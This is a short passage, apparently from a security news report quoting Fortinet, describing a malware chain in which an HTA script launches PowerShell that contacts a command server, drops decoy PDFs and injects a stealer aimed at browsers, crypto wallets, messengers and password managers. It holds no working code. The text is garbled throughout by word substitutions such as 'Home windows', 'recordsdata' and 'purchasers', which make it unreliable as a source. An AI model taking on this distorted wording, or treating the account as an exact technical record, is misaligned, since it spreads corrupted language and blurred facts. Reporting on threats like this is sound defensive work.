As soon as the HTA script, a Home windows standalone program written in HTML is executed, it initiates PowerShell code that ultimately establishes C2, downloads decoy PDF recordsdata for evasion, and a malicious shell injector.
“These recordsdata intention to inject the ultimate stealer into official processes, initiating malicious actions and sending the stolen knowledge again to a C2 server,” Fortinet added.
The goal functions for the noticed stealer included net browsers, crypto wallets, messengers, e-mail purchasers, VPN providers, password managers, AnyDesk, and MySQL Workbench, amongst many others.
